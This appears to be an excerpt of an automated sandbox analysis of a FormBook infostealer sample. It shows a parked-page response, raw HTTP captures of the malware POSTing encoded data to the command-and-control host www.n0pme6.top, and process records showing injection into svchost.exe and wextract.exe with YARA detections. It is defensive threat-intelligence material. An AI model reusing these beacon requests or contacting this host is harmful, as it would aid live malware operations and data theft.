Oct 8, 2024 15:45:37.631547928 CEST	1236	IN	Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Oct 8, 2024 15:45:37.631556988 CEST	1236	IN	Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Oct 8, 2024 15:45:37.633117914 CEST	1236	IN	Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
Oct 8, 2024 15:45:37.633128881 CEST	1236	IN	Data Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
Oct 8, 2024 15:45:37.634542942 CEST	1120	IN	Data Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
Oct 8, 2024 15:45:37.634555101 CEST	1236	IN	Data Raw: 76 65 72 73 2d 61 74 2d 68 6f 73 74 69 6e 67 65 72 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 43 68 61 6e 67 65 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 Data Ascii: vers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCod
Oct 8, 2024 15:45:37.635994911 CEST	1236	IN	Data Raw: 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 69 66 28 76 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 64 2b 2b 29 2c 6f 3c 3d 28 73 3d 76 2d 34 38 3c 31 30 3f 76 2d 32 32 3a 76 2d 36 35 3c 32 36 3f 76 2d 36 Data Ascii: ror("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-
Oct 8, 2024 15:45:37.636006117 CEST	640	IN	Data Raw: 29 29 3b 67 2b 3d 6f 29 79 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 28 73 2b 28 70 2d 73 29 25 28 6f 2d 73 29 2c 30 29 29 29 2c 70 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 70 2d 73 29 2f 28 6f 2d 73 29 29 3b Data Ascii: ));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.le

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49971	198.44.251.203	80	6824	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:45:53.345212936 CEST	775	OUT	POST /2i77/ HTTP/1.1 Host: www.n0pme6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.n0pme6.top Content-Length: 217 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.n0pme6.top/2i77/ User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36 Data Raw: 46 42 65 68 3d 47 52 6d 6a 73 65 46 68 43 55 65 4e 32 2f 6d 65 57 59 46 78 4a 44 46 71 72 67 6f 65 6c 72 49 6e 4c 72 76 53 53 38 37 65 4d 48 33 43 51 67 6c 79 54 76 2f 79 2f 38 58 6c 73 47 4b 34 38 5a 36 68 35 46 5a 4c 6b 4f 77 67 65 37 58 70 2f 65 4c 72 49 45 39 4c 4a 31 64 65 57 62 7a 48 38 4f 37 73 71 62 4a 4e 4a 58 61 31 58 70 68 47 47 35 4e 79 68 70 35 71 2f 47 59 56 42 47 2f 74 39 2b 4c 66 31 63 41 56 73 36 4b 44 4c 50 38 35 61 75 66 48 31 65 6b 53 33 41 76 31 6d 49 51 37 47 45 45 55 79 57 4b 70 34 44 43 58 72 62 35 38 73 43 70 38 30 46 58 64 2f 46 44 4a 70 33 58 6b 6d 32 71 34 55 6d 41 7a 39 30 36 66 51 59 77 45 38 66 77 57 45 41 3d 3d Data Ascii: FBeh=GRmjseFhCUeN2/meWYFxJDFqrgoelrInLrvSS87eMH3CQglyTv/y/8XlsGK48Z6h5FZLkOwge7Xp/eLrIE9LJ1deWbzH8O7sqbJNJXa1XphGG5Nyhp5q/GYVBG/t9+Lf1cAVs6KDLP85aufH1ekS3Av1mIQ7GEEUyWKp4DCXrb58sCp80FXd/FDJp3Xkm2q4UmAz906fQYwE8fwWEA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49972	198.44.251.203	80	6824	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:45:55.887814045 CEST	795	OUT	POST /2i77/ HTTP/1.1 Host: www.n0pme6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.n0pme6.top Content-Length: 237 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.n0pme6.top/2i77/ User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36 Data Raw: 46 42 65 68 3d 47 52 6d 6a 73 65 46 68 43 55 65 4e 33 66 57 65 55 37 74 78 49 6a 46 74 79 51 6f 65 72 37 49 72 4c 72 6a 53 53 35 61 44 4d 53 76 43 65 6c 68 79 53 74 58 79 79 63 58 6c 6b 6d 4b 48 79 35 36 63 35 46 6b 32 6b 4d 6b 67 65 2f 2f 70 2f 66 37 72 49 33 56 49 4a 6c 64 6d 44 4c 7a 4a 79 75 37 73 71 62 4a 4e 4a 58 66 75 58 74 4e 47 47 49 39 79 68 49 35 74 68 32 59 57 41 47 2f 74 33 75 4c 68 31 63 42 32 73 2b 4b 6c 4c 4c 4d 35 61 73 33 48 30 4c 45 52 35 77 76 4a 6f 6f 52 79 43 48 31 46 37 32 4f 50 68 41 4b 52 76 49 78 4a 74 30 30 65 75 6e 62 78 68 55 37 79 74 31 7a 53 78 51 33 4e 57 6e 45 72 77 57 4f 2b 50 76 56 75 78 4e 52 53 53 2f 50 43 63 73 34 33 6e 36 68 7a 59 32 6a 6d 45 7a 53 77 32 39 67 3d Data Ascii: FBeh=GRmjseFhCUeN3fWeU7txIjFtyQoer7IrLrjSS5aDMSvCelhyStXyycXlkmKHy56c5Fk2kMkge//p/f7rI3VIJldmDLzJyu7sqbJNJXfuXtNGGI9yhI5th2YWAG/t3uLh1cB2s+KlLLM5as3H0LER5wvJooRyCH1F72OPhAKRvIxJt00eunbxhU7yt1zSxQ3NWnErwWO+PvVuxNRSS/PCcs43n6hzY2jmEzSw29g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49973	198.44.251.203	80	6824	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:45:58.471081018 CEST	1808	OUT	POST /2i77/ HTTP/1.1 Host: www.n0pme6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.n0pme6.top Content-Length: 1249 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.n0pme6.top/2i77/ User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36 Data Raw: 46 42 65 68 3d 47 52 6d 6a 73 65 46 68 43 55 65 4e 33 66 57 65 55 37 74 78 49 6a 46 74 79 51 6f 65 72 37 49 72 4c 72 6a 53 53 35 61 44 4d 53 6e 43 65 54 64 79 54 4d 58 79 7a 63 58 6c 75 47 4b 38 79 35 36 4e 35 42 78 78 6b 4d 35 62 65 35 37 70 2b 35 76 72 4b 47 56 49 43 6c 64 6d 62 37 7a 45 38 4f 36 32 71 62 5a 4a 4a 58 76 75 58 74 4e 47 47 4c 6c 79 6e 5a 35 74 6a 32 59 56 42 47 2f 62 39 2b 4b 4d 31 63 59 4e 73 2b 65 71 4c 59 45 35 61 4d 6e 48 32 34 73 52 37 51 76 78 34 34 52 71 43 48 34 64 37 32 53 35 68 44 57 2f 76 4c 52 4a 68 42 6f 48 39 57 4c 56 69 43 7a 56 72 54 33 4b 33 52 58 71 53 6c 64 54 33 46 36 6c 4c 74 70 46 6f 66 74 2f 48 72 4c 50 4c 76 59 69 6b 4b 4a 35 63 32 4b 49 52 68 4b 57 30 59 37 69 44 39 6d 30 57 6f 37 53 4c 53 6a 5a 59 62 63 59 50 6d 65 4a 50 75 49 47 33 6a 5a 41 53 72 44 51 66 57 56 69 5a 39 61 46 49 36 4f 46 49 65 44 6b 41 6b 36 62 64 6a 7a 70 31 71 70 72 55 79 53 33 59 65 33 38 45 49 56 6e 74 6b 76 6d 65 34 48 34 62 7a 32 73 6b 2b 6f 7a 73 58 45 6d 6f 31 58 75 39 52 4b 6c 6a [TRUNCATED] Data Ascii: FBeh=GRmjseFhCUeN3fWeU7txIjFtyQoer7IrLrjSS5aDMSnCeTdyTMXyzcXluGK8y56N5BxxkM5be57p+5vrKGVICldmb7zE8O62qbZJJXvuXtNGGLlynZ5tj2YVBG/b9+KM1cYNs+eqLYE5aMnH24sR7Qvx44RqCH4d72S5hDW/vLRJhBoH9WLViCzVrT3K3RXqSldT3F6lLtpFoft/HrLPLvYikKJ5c2KIRhKW0Y7iD9m0Wo7SLSjZYbcYPmeJPuIG3jZASrDQfWViZ9aFI6OFIeDkAk6bdjzp1qprUyS3Ye38EIVntkvme4H4bz2sk+ozsXEmo1Xu9RKljeiBKIGkRyCRGIrFf1zH9HLBdIO4iPr9jJ+rvIIPDXpuDnqG1Zt6UIwTeo5W0l5C16pn4Jm5J1b8hYaS5P80Yx2elkYynhQtwSkHEV5BVZHbDYssI3BlsJ2y8YcNHTeXeaLzJ82fBDsV5ZwzyB2DBkrNFp9dSEbmaLhmBSxLCKRtpXTBR0wdzqb1Vx5bvDzWEPA/7w0NE8SJ9v94pars9LtdrjdH89LN2vgwUtFOJD3MLmP6aAfmUKP/fUoNFYDXWIt19R/qqiHdYSo0F8Be2LLt/GuUfDjJjKv/XOFyLE76itHs41IBAt9bZ95956IjgAN/K8Q+Xtqqe0xn0qF3NPVpg4tFx+WrEkXJxvWhclivdD0zN2+6kK4FC0JAgqGOp/34p3RNx/774JwpSYwS849lnvJZpBHMwPREeiIL6T3IcNXWGOFwA05n2yVv6mdN8qARkezF9RjW1YqeRu+TUWF4fx0MIrySToN1Tcpra1dCUeM8AWGpmIqKRgFdPeAAogSmg2h2FkUTpWk62VNY+AnlawCGsudrdKygvAuVGnUa4TmdvF5rI4VQ7UOSVPNvts16HuSmL+FOuoQFY7yLH8UOQeLZzWdH216Yj68tX+i3K03bEm0wcoABhZg/FALKUEsp224sNDKQeOUzR+dsGSGzWzdV+kewV18 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49974	198.44.251.203	80	6824	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 15:46:01.108316898 CEST	520	OUT	GET /2i77/?FBeh=LTODvrhkMVqC3PKCaJdvO2t6hDsejrMuF+eBTdKoQS/6ei5HfNTQm76vsHOzwLCg1kh0lrMBTIeoxNiIEVh8EQZRdYH26u2LqJt1YWeMJrh5ZIo+pKpB+Wc3K2X12eL+1JIO5dLCeoUs&DfhDq=hvZ8HhLP1L HTTP/1.1 Host: www.n0pme6.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36

Target ID:	0
Start time:	09:44:12
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\oLCnCWQDhK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oLCnCWQDhK.exe"
Imagebase:	0x400000
File size:	1'396'191 bytes
MD5 hash:	6FB6B6CCF47F2867F674C818B974EA28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	09:44:13
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oLCnCWQDhK.exe"
Imagebase:	0xd10000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1910782362.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1910510903.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1911128401.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	11:03:09
Start date:	08/10/2024
Path:	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe"
Imagebase:	0xc60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2505688280.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	13
Start time:	11:03:11
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\wextract.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wextract.exe"
Imagebase:	0x390000
File size:	136'192 bytes
MD5 hash:	B9CC7E24DB7DE2E75678761B1D8BAC3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2503030807.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2505420589.0000000004950000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2505519891.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Target ID:	16
Start time:	11:03:24
Start date:	08/10/2024
Path:	C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\WTxtoIHnwgYQnMauPcJdJlcdhoLvMzBRBwfYcbyutNlTfhPKsepkKmlKAsefUSVxgYQEoQLZSaAhnGS\EthPSueuMbeZ.exe"
Imagebase:	0xc60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	17
Start time:	11:03:41
Start date:	08/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true